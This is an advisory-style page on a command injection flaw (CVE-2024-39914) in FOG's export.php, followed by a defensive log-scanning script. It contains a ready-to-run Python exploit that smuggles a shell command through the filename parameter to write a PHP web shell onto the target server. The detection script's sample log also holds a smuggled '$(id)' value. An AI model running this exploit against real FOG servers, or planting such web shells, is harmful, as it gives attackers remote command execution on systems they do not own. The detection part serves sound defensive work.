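FOG Command Injection Vulnerability (CVE-2024-39914)
Vulnerability Description
FOG is a cloning/imaging/rescue suite/inventory management system. In versions prior to 1.5.10.34, the file packages/web/lib/fog/reportmaker.class.php in FOG is affected by a command injection vulnerability in the filename parameter of /fog/management/export.php. The vulnerability is fixed in version 1.5.10.34.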
#!/usr/bin/env python3
import socket
import sys

rhost = '192.168.15.5'
rport = 80
webshell = 'darek.php' #lol
payload = f"""POST /fog/management/export.php?filename=$(echo+'<?php+echo+shell_exec($_GET['"'cmd'"']);+?>'+>+{webshell})&type=pdf HTTP/1.1\r\nHost: {rhost}\r\nContent-Length: 21\r\nUser-Agent: ToxicPotato\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n\r\nfogguiuser=fog&nojson=2"""

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
    try:
        sock.connect((rhost, rport))
    except:
        print(f'Could not reach {rhost}')
        sys.exit(1)
    sock.sendall(payload.encode())
    data = sock.recv(1024)
    print(data.decode())
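
A defender-side check for the request shape described above, as an added example that is not part of the original page or the FOG project: it scans web-server access log lines for export.php requests whose filename value falls outside an allowlist. The combined log format, the allowlist, the helper names and the sample lines (constructed) are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate export filename only needs these characters.
SAFE_FILENAME = re.compile(r"[A-Za-z0-9._ -]+")
# Request line inside a combined-format access log entry: "METHOD target HTTP/x"
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
EXPORT_PATH = "/management/export.php"

def suspicious_filename(log_line):
    """Return the decoded filename value if the line is an export.php request
    whose filename falls outside the allowlist, otherwise None."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.lower().endswith(EXPORT_PATH):
        return None
    # parse_qs percent-decodes and maps '+' to a space, as PHP does, so a
    # double-encoded value still contains '%' and fails the allowlist.
    for value in parse_qs(url.query).get("filename", []):
        if not SAFE_FILENAME.fullmatch(value):
            return value
    return None

def scan(lines):
    """Return (client_ip, decoded_filename) for every flagged line."""
    return [(line.split()[0], value) for line in lines
            if (value := suspicious_filename(line)) is not None]

# Constructed sample log lines (documentation IP range), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Aug/2024:10:00:01 +0000] "POST /fog/management/export.php'
    '?filename=host_list&type=pdf HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [01/Aug/2024:10:00:07 +0000] "POST /fog/management/export.php'
    '?filename=%24(id)&type=pdf HTTP/1.1" 200 0 "-" "curl/8.0"',
    '192.0.2.44 - - [01/Aug/2024:10:00:09 +0000] "GET /fog/management/index.php'
    '?node=home HTTP/1.1" 200 4096 "-" "curl/8.0"',
]

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip} sent filename={value!r} to export.php")
```

Default access logs record the request line but not the body, so this check only sees a filename passed in the query string. Upgrading to 1.5.10.34 remains the fix; the scan only helps find past attempts.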